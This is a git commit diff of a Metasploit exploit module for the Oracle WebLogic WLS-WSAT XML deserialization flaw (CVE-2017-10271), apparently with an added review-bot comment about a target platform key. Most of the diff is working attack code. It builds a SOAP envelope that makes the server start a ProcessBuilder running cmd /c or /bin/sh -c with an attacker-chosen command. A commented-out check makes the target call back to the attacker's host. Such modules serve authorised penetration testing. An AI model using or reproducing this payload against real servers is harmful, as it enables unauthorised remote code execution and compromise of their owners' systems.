Fix feedback from wvu-r7

Fixes feedback from wvu-r7

- Consolidates payload to single method
- Replaces gsub! with standard encode method
- Credit the vulnerability discoverers and the proof-of-concept author in the module's Author list (still seems weird to include discovery as authorship...)
- Change link
- Use `ARCH_CMD` instead of `[ARCH_CMD]`
- Remove Linux target as it's only Windows or Unix
- Remove timeout as I don't know how to pass it to `send_request_cgi`
MS-2855/keylogger-mettle-extension
Kevin Kirsche 2018-01-06 08:12:43 -05:00 committed by GitHub
parent 744f20304c
commit 867b32415d
1 changed files with 33 additions and 60 deletions


@ -16,13 +16,20 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q(
The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
remote code execution vulnerability. Supported versions that are affected are
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin
of ERPScan and Federico Dotta of Media Service.
),
'License' => MSF_LICENSE,
'Author' => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
'Author' => [
'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module
'Luffin', # Proof of Concept
'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery
],
'References' =>
[
[ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
[ 'URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'],
[ 'POC', 'https://github.com/Luffin/CVE-2017-10271'],
[ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
[ 'CVE', '2017-10271']
],
'Platform' => %w{ win linux unix },
@ -30,13 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Targets' =>
[
[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
[ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
[ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
[ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
],
'Payload' =>
{
'DisableNops' => true
},
'DisclosureDate' => "Oct 19 2017",
# Note that this is by index, rather than name. It's generally easiest
# just to put the default at the beginning of the list and skip this
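Review bot: The Unix target in the `'Targets'` array still uses the bare constant `Platform` as its hash key, while the Windows target on the line above uses the string `'Platform'`; the line should read `[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ],`. Inside an `Msf::Exploit::Remote` subclass the bare name most likely resolves to the framework's `Platform` module rather than the string key, so the Unix target would carry no platform of its own and silently fall back to the module-level platform list. The same selection feeds `cmd_base` and `cmd_opt` in the following hunk, which branch on `target_platform == 'win'`; if `target_platform` returns a platform-list object rather than a `String` in this framework version, that comparison never matches and both targets are handed `/bin/sh`, which is worth confirming against the mixin. The commit fixed the `[ARCH_CMD]` wrapping on this line but left the key unquoted.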
@ -47,24 +49,27 @@ class MetasploitModule < Msf::Exploit::Remote
register_options([
OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
])
end
def cmd_payload
# Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need
# This escaping makes sure that our payload works!
replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ]
xml_prepared = payload.encoded
replacements.each do |r|
xml_prepared.gsub!(r[0], r[1])
def cmd_base
if target_platform == 'win'
return 'cmd'
else
return '/bin/sh'
end
return xml_prepared
end
def unix_payload
def cmd_opt
if target_platform == 'win'
return '/c'
else
return '-c'
end
end
def process_builder_payload
# Generate a payload which will execute on a *nix machine using /bin/sh
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
@ -73,40 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>/bin/sh</string>
<string>#{cmd_base}</string>
</void>
<void index="1">
<string>-c</string>
<string>#{cmd_opt}</string>
</void>
<void index="2">
<string>#{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>}
end
# Generate a payload which will execute on a Windows machine using cmd
def windows_payload
xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>#{cmd_payload}</string>
<string>#{payload.encoded.encode(xml: :text)}</string>
</void>
</array>
<void method="start"/>
@ -119,13 +97,15 @@ class MetasploitModule < Msf::Exploit::Remote
end
# Not sure how to catch the response, so I'll leave this here in case someone can help
# def check_payload
# This payload is used by sending to the RHOST and then you will receive an HTTP request
# back from the target. If you got a request, it's vulnerable. If you didn't, it's not.
# def http_check_payload
# xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
# <soapenv:Header>
# <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
# <java version="1.8" class="java.beans.XMLDecoder">
# <object id="url" class="java.net.URL">
# <string>http://{lhost}:{lport}/{random_uri}</string>
# <string>http://#{datastore['LHOST']}:#{datastore['LPORT']}/#{random_uri}</string>
# </object>
# <object idref="url">
# <void id="stream" method = "openStream" />
@ -142,14 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
# followed by the fake return address and then the payload.
#
def exploit
target_os = datastore['TARGET'].to_i
xml_payload = ''
if target_os == 0
xml_payload = windows_payload
else
xml_payload = unix_payload
end
xml_payload = process_builder_payload
send_request_cgi(
'method' => 'POST',